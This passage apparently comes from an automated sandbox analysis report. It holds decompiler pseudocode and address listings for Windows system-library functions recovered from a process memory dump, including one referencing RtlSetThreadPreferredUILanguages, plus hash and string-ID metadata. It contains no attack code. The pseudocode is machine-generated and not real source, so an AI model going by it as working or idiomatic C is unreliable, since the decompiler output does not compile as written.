                                                    												_t255 = E04B56600( *(_t316 + 0x1c));
                                                    												__eflags = _t255;
                                                    												if(_t255 != 0) {
                                                    													goto L106;
                                                    												} else {
                                                    													_t300 = _a4;
                                                    													goto L75;
                                                    												}
                                                    											}
                                                    										} else {
                                                    											L75:
                                                    											_t336 = E04B72C50(_t300, _a8, _t291, _a16, _a20, _a24, _t328);
                                                    											L76:
                                                    											_v32 = _t336;
                                                    											goto L69;
                                                    										}
                                                    									}
                                                    									goto L108;
                                                    								} else {
                                                    									E04B5EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                    									_v8 = 1;
                                                    									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
                                                    									_t336 = _a24;
                                                    									_t262 = E04B72AE4( &_v36, _a8, _t291, _a16, _a20, _t336);
                                                    									_v32 = _t262;
                                                    									__eflags = _t262 - 0xc0000100;
                                                    									if(_t262 == 0xc0000100) {
                                                    										_v32 = E04B72C50(_v36, _a8, _t291, _a16, _a20, _t336, 1);
                                                    									}
                                                    									_v8 = _t328;
                                                    									E04B72ACB();
                                                    								}
                                                    							}
                                                    						}
                                                    						L69:
                                                    						_v8 = 0xfffffffe;
                                                    						_t248 = _t336;
                                                    					}
                                                    					L70:
                                                    					return E04B9D0D1(_t248);
                                                    				}
                                                    				L108:
                                                    			}

















































                                                    0x04b725f2
                                                    0x04b725f8
                                                    0x00000000
                                                    0x00000000
                                                    0x04b725fe
                                                    0x00000000
                                                    0x04b728e6
                                                    0x04b728ec
                                                    0x04b728ef
                                                    0x04b728f5
                                                    0x04b728f8
                                                    0x04b728f8
                                                    0x00000000
                                                    0x04b728f8
                                                    0x00000000
                                                    0x00000000
                                                    0x04b72866
                                                    0x04b72866
                                                    0x04b72876
                                                    0x04b72879
                                                    0x00000000
                                                    0x00000000
                                                    0x04b727e0
                                                    0x04b727e7
                                                    0x04b727e9
                                                    0x04b727eb
                                                    0x04bb5afd
                                                    0x00000000
                                                    0x04bb5afd
                                                    0x00000000
                                                    0x00000000
                                                    0x04b72633
                                                    0x04b72638
                                                    0x04b7263b
                                                    0x04b7263c
                                                    0x04b7263e
                                                    0x04b72640
                                                    0x04b72642
                                                    0x04b72647
                                                    0x04b72649
                                                    0x04b7264e
                                                    0x04b72650
                                                    0x04b72653
                                                    0x04b72659
                                                    0x04b726a2
                                                    0x04b726a7
                                                    0x04b726ac
                                                    0x04b726b2
                                                    0x04bb5b11
                                                    0x04bb5b15
                                                    0x04bb5b17
                                                    0x00000000
                                                    0x04b726b8
                                                    0x04b726b8
                                                    0x04b726ba
                                                    0x04b727a6
                                                    0x04b727a6
                                                    0x04b727a9
                                                    0x04b727ab
                                                    0x04b727b9
                                                    0x04b727b9
                                                    0x04b727be
                                                    0x04b727c1
                                                    0x04b727c3
                                                    0x04b727c5
                                                    0x04b727c7
                                                    0x04bb5c74
                                                    0x04bb5c79
                                                    0x04bb5c79
                                                    0x04b727c7
                                                    0x00000000
                                                    0x04b726c0
                                                    0x04b726c0
                                                    0x04b726c3
                                                    0x04b726c6
                                                    0x04b726c6
                                                    0x04b726c9
                                                    0x04b726c9
                                                    0x00000000
                                                    0x04b726c9
                                                    0x04b726ba
                                                    0x04b7265b
                                                    0x04b7265b
                                                    0x04b7265e
                                                    0x04b72667
                                                    0x04b7266d
                                                    0x04b72677
                                                    0x04b7267c
                                                    0x04b7267f
                                                    0x04b72681
                                                    0x04bb5b49
                                                    0x04bb5b4e
                                                    0x04b727cd
                                                    0x04b727d0
                                                    0x04b727d1
                                                    0x04b727d2
                                                    0x04b727d4
                                                    0x04b727dd
                                                    0x04b72687
                                                    0x04b72687
                                                    0x04b7268a
                                                    0x04b7268b
                                                    0x04b7268e
                                                    0x04b7268f
                                                    0x04b72691
                                                    0x04b72696
                                                    0x04b72698
                                                    0x04b7269d
                                                    0x04b7269f
                                                    0x00000000
                                                    0x04b7269f
                                                    0x04b72681
                                                    0x00000000
                                                    0x00000000
                                                    0x04b72846
                                                    0x00000000
                                                    0x00000000
                                                    0x04b72605
                                                    0x04b7260a
                                                    0x04b7260c
                                                    0x04b72611
                                                    0x04b72616
                                                    0x04b72619
                                                    0x04b72619
                                                    0x04b7261e
                                                    0x00000000
                                                    0x04b72624
                                                    0x04b72627
                                                    0x04b72627
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb5b1f
                                                    0x00000000
                                                    0x00000000
                                                    0x04b72894
                                                    0x04b7289b
                                                    0x04b7289d
                                                    0x04b728a1
                                                    0x04bb5b2b
                                                    0x04bb5b2e
                                                    0x04bb5b2e
                                                    0x04b728a7
                                                    0x04b728a9
                                                    0x04bb5b04
                                                    0x04bb5b09
                                                    0x04bb5b09
                                                    0x04bb5b09
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb5b35
                                                    0x04bb5b3c
                                                    0x04b728fb
                                                    0x04b728fb
                                                    0x04b726cc
                                                    0x04b726cc
                                                    0x04b726d0
                                                    0x00000000
                                                    0x04b726d2
                                                    0x04b726d2
                                                    0x00000000
                                                    0x04b726d2
                                                    0x00000000
                                                    0x00000000
                                                    0x04b725fe
                                                    0x04b7292d
                                                    0x04b7292d
                                                    0x04b72930
                                                    0x04b72935
                                                    0x04b72939
                                                    0x04b72945
                                                    0x04b72946
                                                    0x04b7295e
                                                    0x04b72966
                                                    0x04b7296e
                                                    0x04b72971
                                                    0x04b72976
                                                    0x04b7297e
                                                    0x04b7297f
                                                    0x04b72980
                                                    0x04b72981
                                                    0x04b72982
                                                    0x04b72983
                                                    0x04b72984
                                                    0x04b72985
                                                    0x04b72986
                                                    0x04b72987
                                                    0x04b72988
                                                    0x04b72989
                                                    0x04b7298a
                                                    0x04b7298b
                                                    0x04b7298c
                                                    0x04b7298d
                                                    0x04b7298e
                                                    0x04b7298f
                                                    0x04b72990
                                                    0x04b72992
                                                    0x04b72997
                                                    0x04b729a3
                                                    0x04b729a6
                                                    0x04b729ab
                                                    0x04b729ad
                                                    0x04b729b0
                                                    0x04b729b2
                                                    0x04bb5c80
                                                    0x04b729b8
                                                    0x04b729b8
                                                    0x04b729bb
                                                    0x04b729c0
                                                    0x04b729c5
                                                    0x04b729c6
                                                    0x04b729c6
                                                    0x04b729c9
                                                    0x04b729cb
                                                    0x00000000
                                                    0x00000000
                                                    0x04b729cd
                                                    0x04b729d0
                                                    0x04b729d9
                                                    0x04b729db
                                                    0x04b729dd
                                                    0x04b72a7f
                                                    0x04b72a84
                                                    0x04b72a87
                                                    0x04b72a89
                                                    0x04bb5ca1
                                                    0x04bb5ca3
                                                    0x00000000
                                                    0x04b72a8f
                                                    0x04b72a8f
                                                    0x00000000
                                                    0x04b72a8f
                                                    0x00000000
                                                    0x04b729e3
                                                    0x04b729e3
                                                    0x04b729e3
                                                    0x00000000
                                                    0x04b729e3
                                                    0x04b729dd
                                                    0x00000000
                                                    0x04b729db
                                                    0x04b729e6
                                                    0x04b729e9
                                                    0x04b729eb
                                                    0x04b729ed
                                                    0x04b729f3
                                                    0x04b729f5
                                                    0x04b729f8
                                                    0x04b729fa
                                                    0x04b72a97
                                                    0x04b72a9a
                                                    0x04b72a9d
                                                    0x04b72add
                                                    0x00000000
                                                    0x04b72a9f
                                                    0x04b72aa2
                                                    0x04b72aa5
                                                    0x04b72aa8
                                                    0x04b72aab
                                                    0x04bb5cab
                                                    0x04bb5caf
                                                    0x04bb5cc5
                                                    0x04bb5cda
                                                    0x04bb5cdc
                                                    0x04bb5cdf
                                                    0x04bb5ce5
                                                    0x00000000
                                                    0x04bb5ceb
                                                    0x04bb5ced
                                                    0x04bb5cee
                                                    0x00000000
                                                    0x04bb5cee
                                                    0x04bb5cb1
                                                    0x04bb5cb4
                                                    0x04bb5cb9
                                                    0x04bb5cbb
                                                    0x00000000
                                                    0x04bb5cbd
                                                    0x04bb5cbd
                                                    0x00000000
                                                    0x04bb5cbd
                                                    0x04bb5cbb
                                                    0x04b72ab1
                                                    0x04b72ab1
                                                    0x04b72ac4
                                                    0x04b72ac6
                                                    0x04b72ac6
                                                    0x00000000
                                                    0x04b72ac6
                                                    0x04b72aab
                                                    0x00000000
                                                    0x04b72a00
                                                    0x04b72a09
                                                    0x04b72a0e
                                                    0x04b72a21
                                                    0x04b72a24
                                                    0x04b72a35
                                                    0x04b72a3a
                                                    0x04b72a3d
                                                    0x04b72a42
                                                    0x04b72a59
                                                    0x04b72a59
                                                    0x04b72a5c
                                                    0x04b72a5f
                                                    0x04b72a5f
                                                    0x04b729fa
                                                    0x04b729f3
                                                    0x04b72a64
                                                    0x04b72a64
                                                    0x04b72a6b
                                                    0x04b72a6b
                                                    0x04b72a6d
                                                    0x04b72a72
                                                    0x04b72a72
                                                    0x00000000

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID: PATH
                                                    • API String ID: 0-1036084923
                                                    • Opcode ID: 8b8cd8982c6b8968e6729cb00abeefafd90d207d51a886320a3a931ad6e00adf
                                                    • Instruction ID: eb4308f0b8b7a8d5d0b893f07102dd53db6d6551b7d3780659be9085ad433c0f
                                                    • Opcode Fuzzy Hash: 8b8cd8982c6b8968e6729cb00abeefafd90d207d51a886320a3a931ad6e00adf
                                                    • Instruction Fuzzy Hash: 4DC18EB5E00219EBDB29DF98D981BBDB7B1FF48704F4440A9E851AB250E774BD41CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 80%
                                                    			E04B7FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                                                    				char _v5;
                                                    				signed int _v8;
                                                    				signed int _v12;
                                                    				char _v16;
                                                    				char _v17;
                                                    				char _v20;
                                                    				signed int _v24;
                                                    				char _v28;
                                                    				char _v32;
                                                    				signed int _v40;
                                                    				void* __ecx;
                                                    				void* __edi;
                                                    				void* __ebp;
                                                    				signed int _t73;
                                                    				intOrPtr* _t75;
                                                    				signed int _t77;
                                                    				signed int _t79;
                                                    				signed int _t81;
                                                    				intOrPtr _t83;
                                                    				intOrPtr _t85;
                                                    				intOrPtr _t86;
                                                    				signed int _t91;
                                                    				signed int _t94;
                                                    				signed int _t95;
                                                    				signed int _t96;
                                                    				signed int _t106;
                                                    				signed int _t108;
                                                    				signed int _t114;
                                                    				signed int _t116;
                                                    				signed int _t118;
                                                    				signed int _t122;
                                                    				signed int _t123;
                                                    				void* _t129;
                                                    				signed int _t130;
                                                    				void* _t132;
                                                    				intOrPtr* _t134;
                                                    				signed int _t138;
                                                    				signed int _t141;
                                                    				signed int _t147;
                                                    				intOrPtr _t153;
                                                    				signed int _t154;
                                                    				signed int _t155;
                                                    				signed int _t170;
                                                    				void* _t174;
                                                    				signed int _t176;
                                                    				signed int _t177;
                                                    
                                                    				_t129 = __ebx;
                                                    				_push(_t132);
                                                    				_push(__esi);
                                                    				_t174 = _t132;
                                                    				_t73 =  !( *( *(_t174 + 0x18)));
                                                    				if(_t73 >= 0) {
                                                    					L5:
                                                    					return _t73;
                                                    				} else {
                                                    					E04B5EEF0(0x4c37b60);
                                                    					_t134 =  *0x4c37b84; // 0x77f07b80
                                                    					_t2 = _t174 + 0x24; // 0x24
                                                    					_t75 = _t2;
                                                    					if( *_t134 != 0x4c37b80) {
                                                    						_push(3);
                                                    						asm("int 0x29");
                                                    						asm("int3");
                                                    						asm("int3");
                                                    						asm("int3");
                                                    						asm("int3");
                                                    						asm("int3");
                                                    						asm("int3");
                                                    						asm("int3");
                                                    						asm("int3");
                                                    						asm("int3");
                                                    						asm("int3");
                                                    						asm("int3");
                                                    						asm("int3");
                                                    						asm("int3");
                                                    						asm("int3");
                                                    						asm("int3");
                                                    						asm("int3");
                                                    						asm("int3");
                                                    						asm("int3");
                                                    						asm("int3");
                                                    						_push(0x4c37b60);
                                                    						_t170 = _v8;
                                                    						_v28 = 0;
                                                    						_v40 = 0;
                                                    						_v24 = 0;
                                                    						_v17 = 0;
                                                    						_v32 = 0;
                                                    						__eflags = _t170 & 0xffff7cf2;
                                                    						if((_t170 & 0xffff7cf2) != 0) {
                                                    							L43:
                                                    							_t77 = 0xc000000d;
                                                    						} else {
                                                    							_t79 = _t170 & 0x0000000c;
                                                    							__eflags = _t79;
                                                    							if(_t79 != 0) {
                                                    								__eflags = _t79 - 0xc;
                                                    								if(_t79 == 0xc) {
                                                    									goto L43;
                                                    								} else {
                                                    									goto L9;
                                                    								}
                                                    							} else {
                                                    								_t170 = _t170 | 0x00000008;
                                                    								__eflags = _t170;
                                                    								L9:
                                                    								_t81 = _t170 & 0x00000300;
                                                    								__eflags = _t81 - 0x300;
                                                    								if(_t81 == 0x300) {
                                                    									goto L43;
                                                    								} else {
                                                    									_t138 = _t170 & 0x00000001;
                                                    									__eflags = _t138;
                                                    									_v24 = _t138;
                                                    									if(_t138 != 0) {
                                                    										__eflags = _t81;
                                                    										if(_t81 != 0) {
                                                    											goto L43;
                                                    										} else {
                                                    											goto L11;
                                                    										}
                                                    									} else {
                                                    										L11:
                                                    										_push(_t129);
                                                    										_t77 = E04B56D90( &_v20);
                                                    										_t130 = _t77;
                                                    										__eflags = _t130;
                                                    										if(_t130 >= 0) {
                                                    											_push(_t174);
                                                    											__eflags = _t170 & 0x00000301;
                                                    											if((_t170 & 0x00000301) == 0) {
                                                    												_t176 = _a8;
                                                    												__eflags = _t176;
                                                    												if(__eflags == 0) {
                                                    													L64:
                                                    													_t83 =  *[fs:0x18];
                                                    													_t177 = 0;
                                                    													__eflags =  *(_t83 + 0xfb8);
                                                    													if( *(_t83 + 0xfb8) != 0) {
                                                    														E04B576E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                                                    														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                                                    													}
                                                    													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                                                    													goto L15;
                                                    												} else {
                                                    													asm("sbb edx, edx");
                                                    													_t114 = E04BE8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                                                    													__eflags = _t114;
                                                    													if(_t114 < 0) {
                                                    														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                                                    														E04B4B150();
                                                    													}
                                                    													_t116 = E04BE6D81(_t176,  &_v16);
                                                    													__eflags = _t116;
                                                    													if(_t116 >= 0) {
                                                    														__eflags = _v16 - 2;
                                                    														if(_v16 < 2) {
                                                    															L56:
                                                    															_t118 = E04B575CE(_v20, 5, 0);
                                                    															__eflags = _t118;
                                                    															if(_t118 < 0) {
                                                    																L67:
                                                    																_t130 = 0xc0000017;
                                                    																goto L32;
                                                    															} else {
                                                    																__eflags = _v12;
                                                    																if(_v12 == 0) {
                                                    																	goto L67;
                                                    																} else {
                                                    																	_t153 =  *0x4c38638; // 0xca6800
                                                    																	_t122 = L04B538A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                                                    																	_t154 = _v12;
                                                    																	_t130 = _t122;
                                                    																	__eflags = _t130;
                                                    																	if(_t130 >= 0) {
                                                    																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                                                    																		__eflags = _t123;
                                                    																		if(_t123 != 0) {
                                                    																			_t155 = _a12;
                                                    																			__eflags = _t155;
                                                    																			if(_t155 != 0) {
                                                    																				 *_t155 = _t123;
                                                    																			}
                                                    																			goto L64;
                                                    																		} else {
                                                    																			E04B576E2(_t154);
                                                    																			goto L41;
                                                    																		}
                                                    																	} else {
                                                    																		E04B576E2(_t154);
                                                    																		_t177 = 0;
                                                    																		goto L18;
                                                    																	}
                                                    																}
                                                    															}
                                                    														} else {
                                                    															__eflags =  *_t176;
                                                    															if( *_t176 != 0) {
                                                    																goto L56;
                                                    															} else {
                                                    																__eflags =  *(_t176 + 2);
                                                    																if( *(_t176 + 2) == 0) {
                                                    																	goto L64;
                                                    																} else {
                                                    																	goto L56;
                                                    																}
                                                    															}
                                                    														}
                                                    													} else {
                                                    														_t130 = 0xc000000d;
                                                    														goto L32;
                                                    													}
                                                    												}
                                                    												goto L35;
                                                    											} else {
                                                    												__eflags = _a8;
                                                    												if(_a8 != 0) {
                                                    													_t77 = 0xc000000d;
                                                    												} else {
                                                    													_v5 = 1;
                                                    													L04B7FCE3(_v20, _t170);
                                                    													_t177 = 0;
                                                    													__eflags = 0;
                                                    													L15:
                                                    													_t85 =  *[fs:0x18];
                                                    													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                                                    													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                                                    														L18:
                                                    														__eflags = _t130;
                                                    														if(_t130 != 0) {
                                                    															goto L32;
                                                    														} else {
                                                    															__eflags = _v5 - _t130;
                                                    															if(_v5 == _t130) {
                                                    																goto L32;
                                                    															} else {
                                                    																_t86 =  *[fs:0x18];
                                                    																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                                                    																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                                                    																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                                                    																}
                                                    																__eflags = _t177;
                                                    																if(_t177 == 0) {
                                                    																	L31:
                                                    																	__eflags = 0;
                                                    																	L04B570F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                                                    																	goto L32;
                                                    																} else {
                                                    																	__eflags = _v24;
                                                    																	_t91 =  *(_t177 + 0x20);
                                                    																	if(_v24 != 0) {
                                                    																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                                                    																		goto L31;
                                                    																	} else {
                                                    																		_t141 = _t91 & 0x00000040;
                                                    																		__eflags = _t170 & 0x00000100;
                                                    																		if((_t170 & 0x00000100) == 0) {
                                                    																			__eflags = _t141;
                                                    																			if(_t141 == 0) {
                                                    																				L74:
                                                    																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                                                    																				goto L27;
                                                    																			} else {
                                                    																				_t177 = E04B7FD22(_t177);
                                                    																				__eflags = _t177;
                                                    																				if(_t177 == 0) {
                                                    																					goto L42;
                                                    																				} else {
                                                    																					_t130 = E04B7FD9B(_t177, 0, 4);
                                                    																					__eflags = _t130;
                                                    																					if(_t130 != 0) {
                                                    																						goto L42;
                                                    																					} else {
                                                    																						_t68 = _t177 + 0x20;
                                                    																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                                                    																						__eflags =  *_t68;
                                                    																						_t91 =  *(_t177 + 0x20);
                                                    																						goto L74;
                                                    																					}
                                                    																				}
                                                    																			}
                                                    																			goto L35;
                                                    																		} else {
                                                    																			__eflags = _t141;
                                                    																			if(_t141 != 0) {
                                                    																				_t177 = E04B7FD22(_t177);
                                                    																				__eflags = _t177;
                                                    																				if(_t177 == 0) {
                                                    																					L42:
                                                    																					_t77 = 0xc0000001;
                                                    																					goto L33;
                                                    																				} else {
                                                    																					_t130 = E04B7FD9B(_t177, 0, 4);
                                                    																					__eflags = _t130;
                                                    																					if(_t130 != 0) {
                                                    																						goto L42;
                                                    																					} else {
                                                    																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                                                    																						_t91 =  *(_t177 + 0x20);
                                                    																						goto L26;
                                                    																					}
                                                    																				}
                                                    																				goto L35;
                                                    																			} else {
                                                    																				L26:
                                                    																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                                                    																				__eflags = _t94;
                                                    																				L27:
                                                    																				 *(_t177 + 0x20) = _t94;
                                                    																				__eflags = _t170 & 0x00008000;
                                                    																				if((_t170 & 0x00008000) != 0) {
                                                    																					_t95 = _a12;
                                                    																					__eflags = _t95;
                                                    																					if(_t95 != 0) {
                                                    																						_t96 =  *_t95;
                                                    																						__eflags = _t96;
                                                    																						if(_t96 != 0) {
                                                    																							 *((short*)(_t177 + 0x22)) = 0;
                                                    																							_t40 = _t177 + 0x20;
                                                    																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                                                    																							__eflags =  *_t40;
                                                    																						}
                                                    																					}
                                                    																				}
                                                    																				goto L31;
                                                    																			}
                                                    																		}
                                                    																	}
                                                    																}
                                                    															}
                                                    														}
                                                    													} else {
                                                    														_t147 =  *( *[fs:0x18] + 0xfc0);
                                                    														_t106 =  *(_t147 + 0x20);
                                                    														__eflags = _t106 & 0x00000040;
                                                    														if((_t106 & 0x00000040) != 0) {
                                                    															_t147 = E04B7FD22(_t147);
                                                    															__eflags = _t147;
                                                    															if(_t147 == 0) {
                                                    																L41:
                                                    																_t130 = 0xc0000001;
                                                    																L32:
                                                    																_t77 = _t130;
                                                    																goto L33;
                                                    															} else {
                                                    																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                                                    																_t106 =  *(_t147 + 0x20);
                                                    																goto L17;
                                                    															}
                                                    															goto L35;
                                                    														} else {
                                                    															L17:
                                                    															_t108 = _t106 | 0x00000080;
                                                    															__eflags = _t108;
                                                    															 *(_t147 + 0x20) = _t108;
                                                    															 *( *[fs:0x18] + 0xfc0) = _t147;
                                                    															goto L18;
                                                    														}
                                                    													}
                                                    												}
                                                    											}
                                                    											L33:
                                                    										}
                                                    									}
                                                    								}
                                                    							}
                                                    						}
                                                    						L35:
                                                    						return _t77;
                                                    					} else {
                                                    						 *_t75 = 0x4c37b80;
                                                    						 *((intOrPtr*)(_t75 + 4)) = _t134;
                                                    						 *_t134 = _t75;
                                                    						 *0x4c37b84 = _t75;
                                                    						_t73 = E04B5EB70(_t134, 0x4c37b60);
                                                    						if( *0x4c37b20 != 0) {
                                                    							_t73 =  *( *[fs:0x30] + 0xc);
                                                    							if( *((char*)(_t73 + 0x28)) == 0) {
                                                    								_t73 = E04B5FF60( *0x4c37b20);
                                                    							}
                                                    						}
                                                    						goto L5;
                                                    					}
                                                    				}
                                                    			}

















































                                                    0x04b7fbc5
                                                    0x04b7fbcb
                                                    0x04b7fbf8
                                                    0x04b7fbf8
                                                    0x04b7fbfa
                                                    0x00000000
                                                    0x04b7fc00
                                                    0x04b7fc00
                                                    0x04b7fc03
                                                    0x00000000
                                                    0x04b7fc09
                                                    0x04b7fc09
                                                    0x04b7fc0f
                                                    0x04b7fc15
                                                    0x04b7fc23
                                                    0x04b7fc23
                                                    0x04b7fc25
                                                    0x04b7fc27
                                                    0x04b7fc75
                                                    0x04b7fc7c
                                                    0x04b7fc84
                                                    0x00000000
                                                    0x04b7fc29
                                                    0x04b7fc29
                                                    0x04b7fc2d
                                                    0x04b7fc30
                                                    0x04bbbf0f
                                                    0x00000000
                                                    0x04b7fc36
                                                    0x04b7fc38
                                                    0x04b7fc3b
                                                    0x04b7fc41
                                                    0x04bbbf17
                                                    0x04bbbf19
                                                    0x04bbbf48
                                                    0x04bbbf4b
                                                    0x00000000
                                                    0x04bbbf1b
                                                    0x04bbbf22
                                                    0x04bbbf24
                                                    0x04bbbf26
                                                    0x00000000
                                                    0x04bbbf2c
                                                    0x04bbbf37
                                                    0x04bbbf39
                                                    0x04bbbf3b
                                                    0x00000000
                                                    0x04bbbf41
                                                    0x04bbbf41
                                                    0x04bbbf41
                                                    0x04bbbf41
                                                    0x04bbbf45
                                                    0x00000000
                                                    0x04bbbf45
                                                    0x04bbbf3b
                                                    0x04bbbf26
                                                    0x00000000
                                                    0x04b7fc47
                                                    0x04b7fc47
                                                    0x04b7fc49
                                                    0x04b7fcb2
                                                    0x04b7fcb4
                                                    0x04b7fcb6
                                                    0x04b7fcdc
                                                    0x04b7fcdc
                                                    0x00000000
                                                    0x04b7fcb8
                                                    0x04b7fcc3
                                                    0x04b7fcc5
                                                    0x04b7fcc7
                                                    0x00000000
                                                    0x04b7fcc9
                                                    0x04b7fcc9
                                                    0x04b7fccd
                                                    0x00000000
                                                    0x04b7fccd
                                                    0x04b7fcc7
                                                    0x00000000
                                                    0x04b7fc4b
                                                    0x04b7fc4b
                                                    0x04b7fc4e
                                                    0x04b7fc4e
                                                    0x04b7fc51
                                                    0x04b7fc51
                                                    0x04b7fc54
                                                    0x04b7fc5a
                                                    0x04b7fc5c
                                                    0x04b7fc5f
                                                    0x04b7fc61
                                                    0x04b7fc63
                                                    0x04b7fc65
                                                    0x04b7fc67
                                                    0x04b7fc6e
                                                    0x04b7fc72
                                                    0x04b7fc72
                                                    0x04b7fc72
                                                    0x04b7fc72
                                                    0x04b7fc67
                                                    0x04b7fc61
                                                    0x00000000
                                                    0x04b7fc5a
                                                    0x04b7fc49
                                                    0x04b7fc41
                                                    0x04b7fc30
                                                    0x04b7fc27
                                                    0x04b7fc03
                                                    0x04b7fbcd
                                                    0x04b7fbd3
                                                    0x04b7fbd9
                                                    0x04b7fbdc
                                                    0x04b7fbde
                                                    0x04b7fc99
                                                    0x04b7fc9b
                                                    0x04b7fc9d
                                                    0x04b7fcd5
                                                    0x04b7fcd5
                                                    0x04b7fc89
                                                    0x04b7fc89
                                                    0x00000000
                                                    0x04b7fc9f
                                                    0x04b7fc9f
                                                    0x04b7fca3
                                                    0x00000000
                                                    0x04b7fca3
                                                    0x00000000
                                                    0x04b7fbe4
                                                    0x04b7fbe4
                                                    0x04b7fbe4
                                                    0x04b7fbe4
                                                    0x04b7fbe9
                                                    0x04b7fbf2
                                                    0x00000000
                                                    0x04b7fbf2
                                                    0x04b7fbde
                                                    0x04b7fbcb
                                                    0x04b7fbab
                                                    0x04b7fc8b
                                                    0x04b7fc8b
                                                    0x04b7fc8c
                                                    0x04b7fb80
                                                    0x04b7fb72
                                                    0x04b7fb5e
                                                    0x04b7fc8d
                                                    0x04b7fc91
                                                    0x04b7fadf
                                                    0x04b7fadf
                                                    0x04b7fae1
                                                    0x04b7fae4
                                                    0x04b7fae7
                                                    0x04b7faec
                                                    0x04b7faf8
                                                    0x04b7fb00
                                                    0x04b7fb07
                                                    0x04b7fb0f
                                                    0x04b7fb0f
                                                    0x04b7fb07
                                                    0x00000000
                                                    0x04b7faf8
                                                    0x04b7fadd

                                                    Strings
                                                    • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 04BBBE0F
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                    • API String ID: 0-865735534
                                                    • Opcode ID: ed1b6c865e0d0dbe1a94c5394d8915914a43606f879faf3d559d922849a6be2d
                                                    • Instruction ID: bd2587faefb5e52a703381860cd39c5301748b1e7a29391f266bb62cd942aa19
                                                    • Opcode Fuzzy Hash: ed1b6c865e0d0dbe1a94c5394d8915914a43606f879faf3d559d922849a6be2d
                                                    • Instruction Fuzzy Hash: 5FA12471B006059BEB25CF68C850BBAB7A4EF48714F0449E9E962DB790EB74F801DB84
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 63%
                                                    			E04B42D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
                                                    				signed char _v8;
                                                    				signed int _v12;
                                                    				signed int _v16;
                                                    				signed int _v20;
                                                    				signed int _v24;
                                                    				intOrPtr _v28;
                                                    				intOrPtr _v32;
                                                    				signed int _v52;
                                                    				void* __esi;
                                                    				void* __ebp;
                                                    				intOrPtr _t55;
                                                    				signed int _t57;
                                                    				signed int _t58;
                                                    				char* _t62;
                                                    				signed char* _t63;
                                                    				signed char* _t64;
                                                    				signed int _t67;
                                                    				signed int _t72;
                                                    				signed int _t77;
                                                    				signed int _t78;
                                                    				signed int _t88;
                                                    				intOrPtr _t89;
                                                    				signed char _t93;
                                                    				signed int _t97;
                                                    				signed int _t98;
                                                    				signed int _t102;
                                                    				signed int _t103;
                                                    				intOrPtr _t104;
                                                    				signed int _t105;
                                                    				signed int _t106;
                                                    				signed char _t109;
                                                    				signed int _t111;
                                                    				void* _t116;
                                                    
                                                    				_t102 = __edi;
                                                    				_t97 = __edx;
                                                    				_v12 = _v12 & 0x00000000;
                                                    				_t55 =  *[fs:0x18];
                                                    				_t109 = __ecx;
                                                    				_v8 = __edx;
                                                    				_t86 = 0;
                                                    				_v32 = _t55;
                                                    				_v24 = 0;
                                                    				_push(__edi);
                                                    				if(__ecx == 0x4c35350) {
                                                    					_t86 = 1;
                                                    					_v24 = 1;
                                                    					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
                                                    				}
                                                    				_t103 = _t102 | 0xffffffff;
                                                    				if( *0x4c37bc8 != 0) {
                                                    					_push(0xc000004b);
                                                    					_push(_t103);
                                                    					E04B897C0();
                                                    				}
                                                    				if( *0x4c379c4 != 0) {
                                                    					_t57 = 0;
                                                    				} else {
                                                    					_t57 = 0x4c379c8;
                                                    				}
                                                    				_v16 = _t57;
                                                    				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
                                                    					_t93 = _t109;
                                                    					L23();
                                                    				}
                                                    				_t58 =  *_t109;
                                                    				if(_t58 == _t103) {
                                                    					__eflags =  *(_t109 + 0x14) & 0x01000000;
                                                    					_t58 = _t103;
                                                    					if(__eflags == 0) {
                                                    						_t93 = _t109;
                                                    						E04B71624(_t86, __eflags);
                                                    						_t58 =  *_t109;
                                                    					}
